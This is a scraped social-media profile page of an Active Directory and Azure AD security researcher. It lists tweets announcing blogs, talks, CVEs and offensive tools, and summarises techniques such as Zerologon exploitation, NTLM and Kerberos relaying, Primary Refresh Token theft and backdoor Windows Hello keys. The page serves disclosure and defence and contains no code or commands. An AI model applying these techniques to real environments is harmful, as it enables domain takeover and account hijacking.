Dirk-jan
@_dirkjan
Followers
25,501
Following
181
Media
128
Statuses
1,812
Hacker at @OutsiderSec . Researches AD and Azure (AD) security. Likes to play around with Python and write tools that make work easier.
Joined December 2017
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Bolivia
• 1045476 Tweets
Luis Arce
• 268591 Tweets
Georgia
• 262110 Tweets
Topic
• 78076 Tweets
Corinthians
• 62653 Tweets
Jamaica
• 56451 Tweets
#虎に翼
• 51437 Tweets
Spurs
• 43905 Tweets
Baco
• 39419 Tweets
#NBADraft
• 35035 Tweets
Juventude
• 29568 Tweets
Hawks
• 29116 Tweets
Wesley
• 29111 Tweets
#AEWDynamite
• 24228 Tweets
Sarr
• 23036 Tweets
Wizards
• 22221 Tweets
Rossi
• 21217 Tweets
Deni
• 20344 Tweets
Reed Sheppard
• 18536 Tweets
Clingan
• 18020 Tweets
Memphis
• 17806 Tweets
Bronny
• 17410 Tweets
Portland
• 17381 Tweets
Rob Dillingham
• 17187 Tweets
梅子さん
• 15511 Tweets
Zach Edey
• 15033 Tweets
Wemby
• 12381 Tweets
Blazers
• 11877 Tweets
Pistons
• 11841 Tweets
Ayrton Lucas
• 10788 Tweets
Victor Hugo
• 10126 Tweets
Pinned Tweet
Some big personal news: last year I decided to start my own company. Today I'm making it official and announcing Outsider Security (
@OutsiderSec
). My focus will be on Azure AD and Active Directory security, converting my research experience into in-depth tests and advice.
102
83
1K
Fox-IT just open sourced their enterprise forensics tooling dissect. This is a big project that some of the smartest people I know have worked on. It supports many filesystems and file formats, all as Python libraries. Docs: / code:
24
635
2K
So yes, Zerologon (CVE-2020-1472) is quite easy to exploit. Unauthenticated user to Domain Admin. This is really scary. Run exploit, DCSync with DC account and empty NT hash: you have Domain Admin and a broken DC.
Awesome find by Tom Tervoort 🙂. Patch patch patch!
22
897
2K
It has a few more prerequisites, but I finally managed to get a
#Zerologon
exploit working that doesn't rely on resetting passwords to exploit. Use the printerbug to make DC1 connect to you, then with lots of magic relay that to DC2 directly to DRSUAPI to DCSync 😁
28
572
1K
New blog: A different way of abusing Zerologon. No more password reset needed: using the printer bug with Zerologon to relay to DRSUAPI and DCSync directly with ntlmrelayx:
Code:
22
612
1K
There seems to be quite some questions and confusion about the impact of exploiting Zerologon (CVE-2020-1472) on the environment. So here's a thread 👇
5
540
1K
New blog: Relaying Kerberos over DNS using krbrelayx and mitm6.
New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services.
Blog:
24
510
1K
I've added the material from my Black Hat US talk yesterday to my blog. If you are interested in Azure AD security, love account hijacks, MFA bypass, persistence techniques and privescs, give it a read:
15
311
1K
New blog! Abusing Exchange: One API call away from Domain Admin. From any user with a mailbox to Domain Admin. Probably affects the majority of orgs using AD and Exchange.
28
611
962
Just published: "Getting in the Zone: dumping Active Directory DNS using adidnsdump". Recon tool to dump DNS records in AD as any authenticated user, similar to a zone transfer.
Tool:
Blog:
12
471
943
What a time to be alive... Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal. Only needs https outbound to Azure and line of sight from victim to target host
20
337
915
[Blog] Office 365 was vulnerable to network attacks due to a vulnerability in Microsoft Teams. Here's a demo of an attacker obtaining access to all emails and OneDrive/SharePoint files if the victim joins an attacker controlled network. Details:
8
473
832
Short blog and POC code for CVE-2019-1040 (patched last Tuesday). Combining this vulnerability with the SpoolService bug and Kerberos delegation means: any AD user to Domain Admin; RCE on unpatched hosts; possible over Forest trusts. TL;DR: GO PATCH!
20
580
827
New blog: Obtaining Domain Admin from Azure AD by abusing Cloud Kerberos Trust
I teased this a bit during my Windows Hello talks, now found some time to write about this interesting technique. Also contains defenses and detection opportunities.
8
343
804
I wrote a small scanner utility to check if systems are vulnerable to CVE-2019-1040, the NTLM Mic vulnerability that allows for Active Directory takeover. Published here:
7
399
759
New blog: NTLM relaying to AD CS - On certificates, printers and a little hippo
Tool release - PKINITtools:
14
333
706
It's been long overdue, but my part 2 blog on Active Directory forest trusts is finally here! This blog is about trust transitivity and on the finding on CVE-2020-0665 which was a trust bypass by faking a domain. Enjoy the (long) read:
10
299
702
It's been quiet for a while around bloodhound Python, however I'm happy to share that I am now maintaining the project at my personal GitHub. The latest version fixes many bugs/issues, also thanks to the many PRs that were submitted (thanks all!).
11
209
662
New blog: Phishing for Primary Refresh Tokens and Windows Hello keys. This blog describes how we can use device code phishing to obtain PRTs and in some cases even add backdoor Windows Hello keys 🤯
10
292
613
New blog: "Abusing forgotten permissions on computer objects in Active Directory".
The post is a dive into permissions that are set when you pre-create computer accounts the wrong way, why BloodHound missed those and how to abuse, fix, or monitor for this.
9
266
576
New blog up! "Abusing Azure AD SSO with the Primary Refresh Token", digging into Hybrid environments, SSO, Conditional Access policies and other Azure AD fun. New update for ROADtools, introducing ROADtoken which uses SSO to get persistent Azure AD tokens
10
304
541
Hey
@bookingcom
, I'm getting scammed via your official message system on a real booking. Sounds like you're having some security troubles.
61
78
528
New blog: Lateral movement and on-prem NT hash dumping with Microsoft Entra Temporary Access Passes.
Some tips and tricks on abusing TAPs for Windows Hello persistence and NT hash recovery over Cloud Kerberos Trust.
9
256
538
BloodHound 4.1 was just released and I'm happy to share that the BloodHound python ingestor is ready for the new format and edges it introduces! Via GitHub only for now, please test and let me know if there are errors 🙂
3
174
501
Just found an interesting lateral movement/post-ex technique in Azure AD to move between identities. It's stealthy, non-destructive, bypasses MFA, and can be used to move from cloud to on-prem in several hybrid scenarios. Now moving on to figure out all scenarios and impact😅
15
48
504
secretsdump(.py) slow processing your NTDS.dit? Soon not anymore! With
@Schamperr
's esedb parser implementation processing time of a 5GB dit file went from 45 minutes down to 1.5 minutes 😲! Code will be released as open source when fully ready 🙂
14
140
485
Content of my
#RomHack2021
talk "Breaking Azure AD joined endpoints in Zero Trust environments" is up!
Video:
Slides (pdf):
As usual all the links to my talk materials are also on
12
223
485
Thanks to
@elad_shamir
's research, network access once again means RCE against Windows hosts in that (V)LAN. Combining mitm6, ntlmrelayx and RBCD to abuse AD defaults. New blog: The worst of both worlds, Combining NTLM relaying and Kerberos Delegation:
9
309
457
[New blog] Updating adconnectdump - a journey into DPAPI; In which I describe the process of understanding and decrypting the DPAPI encrypted credentials of Azure AD connect. This again enables dumping these credentials via only network calls (as admin).
7
247
444
Took me a few days, still don't know exactly how/why it works, but I now have a new-ish on-prem to cloud technique via a Seamless SSO (Kerberos) backdoor key. Some features:
- No GA needed to add key
- Invisible backdoor (no logs in AAD) 🫣
- 1st factor auth to any synced user
6
119
443
2 new releases today exploiting default settings in AD! First: Invoke-ACLPwn, a PowerShell script to exploit ACL paths detected by
#BloodHound
. Second is the ACL attack for ntlmrelayx: relaying machine accounts for DA!
Code:
Blog:
0
289
433
This patch Tuesday brings patches for some memory corruptions I found in AD integrated DNS which could lead to RCE from Authenticated Users to SYSTEM on a Domain Controller... CVEs assigned are CVE-2020-0644, CVE-2020-761 and CVE-2020-0718.
12
144
414
Just uploaded the first verion of , an impacket based BloodHound ingestor in Python. is still in beta and not complete, so testing and feedback is welcome!
1
230
406
Thanks to everyone who attended the live stream! My Azure AD framework ROADtools is now available. Includes the ROADrecon exploration tool.
Blog + stream recording:
Code:
8
202
406
Finally finished my (rather long) blog and toolkit about Unconstrained Kerberos Delegation:
Hope you'll all enjoy the read!
10
236
403
New blog and tool: Introducing ROADtools Token eXchange (roadtx) - Automating Azure AD authentication, Primary Refresh Token (ab)use and device registration.
Blog:
Code:
Some features in screenshot attached.
13
197
383
Quite a nice post about Azure AD attacks, summarizes a lot of work done in this area and features ROADtools 😃
2
172
357
I am officially announcing my first training offering "Offensive Azure AD and Hybrid AD security". It is an in-depth, hands-on training that teaches the core concepts, protocols and attack techniques of Azure AD and hybrid environments. Check:
6
69
342
Did you know an Azure AD user can read the bitlocker key for any devices they own? (Provided the bitlocker key is backed up to Azure AD). The latest version of roadrecon shows bitlocker keys in the GUI. You can also see them for all devices in several roles (including read roles)
5
115
344
It's been a while since I posted about BloodHound .py, but lots of things have been added! Now at v0.7.0, with support for ACL collection, loggedon, DCOM/RDP and object properties. Also works with Python 3 now! Check it out on the
@foxit
GitHub
2
147
336
Today's patch Tuesday fixes CVE-2020-0665, which is an Active Directory forest trust security bypass using Kerberos magic 🙃 if you use forests as a security boundary you may want to patch this. Advisory (though text is inaccurate):
6
164
327
Seems Microsoft is finally taking a stance against NTLM relaying to LDAP, by enforcing LDAP signing and channel binding by default starting January 2020. This is a big and important change to improve AD security, especially from a network point of view!
Microsoft strongly advises customers... always a warning, especially if it involves DCs and LDAP and MS announces upcoming changes
1
23
73
4
150
321
Just published a new tool: - Active Directory ACL exploitation with
#BloodHound
, as presented on
#HITB2018DXB
Armory.
Code/Documentation:
Slides:
@HITBSecConf
@HITBArmory
2
176
314
Since there are already public POCs out there now, here is mine:
Requires latest impacket version from GitHub!
3
157
314
Another blog on the Primary Refresh Token! Thx
@gentilkiwi
for figuring this out with me! Tl;Dr: PRT can be extracted from lsass with
#mimikatz
🥝. If with TPM, session key is protected. Still possible to extract derived keys and sign your own PRT cookies.
7
158
315
Been a long day but thanks to
@gentilkiwi
's awesome new mimikatz CloudAP support we managed to put together tooling that can sign arbitrary PRT cookies! Secrets from lsass + DPAPI + crypto magic + horrible C code = working POC of session key extraction.
4
117
313
Slides and video of my
#bluehatseattle
talk "A year of hacking Azure AD" are online! Contains my exploration of the unofficial "1.61-internal" version of the Azure AD graph and the resulting vulnerabilities😃
Slides:
Video:
3
136
301
For those looking into building/testing detection for
#PrivExchange
, but don't have a lab available, here are a pcap and event log export
5
147
291
New blog up: Syncing yourself to Global Administrator in Azure AD; describing a vulnerability I discovered last year in Azure AD Connect that allowed for
#Azure
AD/Office 365 (admin) account takeover.
6
160
286
Since
@_wald0
and
@CptJesus
just released
#BloodHound
3.0 I've merged the v3 branch of the BloodHound python ingestor and pushed the new version to pypi. New version works with v3 syntax and contains many fixes and new features! See
2
126
287
Very excited to start a personal blog! Kicking off today with the first part of my research into Active Directory Forest trusts: How does SID filtering work? Including techniques to pwn incorrectly configured Forest trusts ;)
10
143
285
Microsoft released patches for
#PrivExchange
today!
1) Latest version won't authenticate when sending push notifications
2) Exchange privileges in AD are reduced (!), removing DACL control over the domain root object (+ others). This requires manual rerun of setup.exe /prepareAD
3
190
285
The video recording of my Black Hat talk this summer "Backdooring and Hijacking Azure AD Accounts by Abusing External Identities" made it to YouTube:
1
118
278
Slides from my
@WEareTROOPERS
#TR19
talk about hacking Azure AD are now online! Was so much fun presenting here 😀 recording of the talk and tools release will follow!
1
136
266
In other news, more than 4 years after I reported this, Microsoft finally removed the ability to modify conditional access policies via the Azure AD Graph. 🎉 Before this change, the AD connect sync account could change/remove all policies, defeating MFA reqs via CA.
7
50
264
In other training news, I've been notified that my Azure AD security training has been accepted for Black Hat USA in Las Vegas this summer 🥳 Looking forward to see everyone in Vegas again! 😁
14
9
249
As promised, here is
@donnymaasland
's blog about bypassing McAfee's password and admin check which lets you export and import the configuration. This allows viewing exclusions, adding your own or changing the protection password.
5
145
245
New
#powershell
tool to phish for user credentials using existing applications as a (realistic) cover: Includes Cobalt Strike script 😀
5
149
229
Just pushed v1.0.4 of the Python BloodHound ingestor to pypi, containing various bugfixes. Thanks for the bug reports everyone!
0
96
232
👀 looks like Microsoft started with rolling out the Conditional Access features for controlling device code flow auth that I mentioned in my last blog . Seems to be in preview, not in all tenants yet.
5
77
229
Relaying Kerberos, for real this time 😁 (teaser, needs some more work)
2
43
227
v0.4.0 of is now up! Major rewrite and cross domain support now make it support all of SharpHounds default collection. Also removed the beta labels since it has been tested without issues on several networks. Get it at or PyPi.
1
147
227
Because Microsoft quietly removed the possibility to sign in using the Primary Refresh Token (Azure AD SSO) without a nonce, I've slightly altered the flow with ROADrecon and ROADtoken to request a nonce first. Blog also updated:
5
83
224
New BloodHound version 4.2 means new BloodHound[.]py version 😀 BloodHound python v1.4.0 is now live, compatible with the latest BloodHound version. It includes the research from my last blog as a new edge "WriteAccountRestrictions", which also got added to SharpHound ❤️
2
59
220
During my DC27 and TR19 talks I talked about App Admins (and Sync accounts) escalating privileges in
#AzureAD
by taking over service principals. I thought this was fixed for default
#Office365
apps. Turns out isn't and considered by design. Here's a blog:
4
105
215
New blog post up with
@FSDominguez
: Listening on port 445 on Windows and remote NTLM relaying through tunnels with ntlmrelayx and meterpreter.
1
121
212
There's a lot going around about analyzing Azure AD environments for compromise and risky/rogue permissions lately. Most focus on logs, but if there are no (more) logs or you just want to review AAD as a blue teamer, here is how ROADrecon () can help:
1
76
205
I've made some major improvements to data gathering with ROADrecon in larger tenants. Data collection is now much faster, uses automatic throttling and retries requests when throttled by AAD Graph. Would love if people can give it a try in larger tenants.
3
68
203
Always wanted to find out which Microsoft first-party app has the right pre-approved scope for what you need? roadtx now has a "getscope" utility, which lists the clients with the desired scope. Useful if you want to access API data without admin approval.
5
65
204
In my Black Hat talk I referenced a guest account hijack that is very hard to identify after the fact. For blue teamers here, I've made a KQL query available for hunting this abuse in Azure AD audit logs. It should be possible it identify historical abuse:
1
52
196
Too bad for the hours I spent writing this in C, but I did finally figure out how to do the Primary Refresh Token key derivation in Python. This means you can now use the session key from Mimikatz directly in roadlib/roadrecon! Only with version on GitHub
4
46
194
The number of times people have simply clicked "Approve" for us when we ran into Azure AD MFA is surprisingly high. It really makes me wonder if MFA via push notifications is such a good idea at all security wise.
25
37
198
Working on some tooling, and managed to get PRT injection during browser sign-in working with Selenium. If you steal a PRT from a hybrid/compliant device, you can use this to "upgrade" the sign-in of other users, to comply with conditional access policies requiring this status.
6
42
196
With a few small modifications
@MDSecLabs
' Office 365 attack toolkit works with ROADtools tokens. This makes it a nice GUI for API tokens obtained with SSO abuse or via other means. cc
@0x09AL
3
61
194
If you're playing with Kerberos and want to view the encrypted parts in Wireshark you can do so with a keytab file. Since impacket was missing structures for this I added a script to my forest trust tools repo which easily allows adding multiple keys:
2
69
191
Because nobody likes waiting, my
@foxit
colleague Matthijs wrote a python based BloodHound data loader for neo4j, which is a factor 3-5 times faster than the UI:
1
85
190
I've probably spent way too much time on this but it's getting near the point I want it to be for first release. Explore Azure AD with
#ROADtools
. Now I "just" have to transfer the things I wanted to put in a talk into a blog and make it release ready... Soon(-ish)!
8
48
187
We just released v0.3.0 of , adding multithreading, trusts and cross-domain logins! If you can, please test it and let us know about issues.
1
114
173
The slides and recording from my
@NorthSec_io
talk (Windows) Hello from the other side are available at
I've also released a new version of roadtx that supports the AAD Windows Hello key provisioning process and authentication to get PRTs 🙂
2
73
172
📢 In the last weeks, Microsoft has patched several major flaws in Windows Hello for Business and Azure AD. In short, it was possible to: Provision new WHFB keys without MFA or via SSO tokens, and move laterally by registering keys on other users, if done from a privileged role.
6
45
172
I'll be revisiting the details of my AD forest trust bypass that was patched last year. If you're into obscure Kerberos details, this may interest you 🙃 my aim is to also drop the tools and blog around this date!
This free Webcast provides technical details on how Kerberos works over forest trusts and how the security boundary is normally enforced, accompanied by a proof-of-concept and a demonstration of abusing the vulnerability. June 3 at 11am PST. Register here:
0
16
63
1
34
167
New major roadrecon release is out! This release adds supports for:
- Eligible AAD admin roles (PIM)
- Scoped and custom roles
- Administrative Units
All now in the GUI and readable by any member user in the tenant (yes including eligible roles)😀
1
54
169
More tools and blog in progress: playing with unconstrained delegation, impacket and printer bugs to compromise forests 😀
4
79
161
Curious about the (in)security of Windows Hello for Business? Want to know how you could add new WHFB keys without MFA and move laterally with them? The recording of my talk about this topic at Troopers 23 is now online!
2
56
159
This Tuesday, Microsoft rolled out patches for a Windows Hello for Business vulnerability that I found. It's tracked as CVE-2023-36871. I don't know if/when I'll give a talk about this, but essentially this defeated the TPM protection of WHFB keys
3
45
157
Here's a demo of the MFA bypass, which I particularly love because it could all be done in the GUI, no need to do any lower level operations (original at )
3
52
155
Excited for my talk tomorrow at the (free!)
@WWHackinFest
Cloud pentesting roundup! Giving a talk about Azure AD Conditional Access policies. Slides still need some work but I have a logo 😁 Tomorrow Dec 10th at 2pm eastern / 18:00 CET! More details:
4
37
153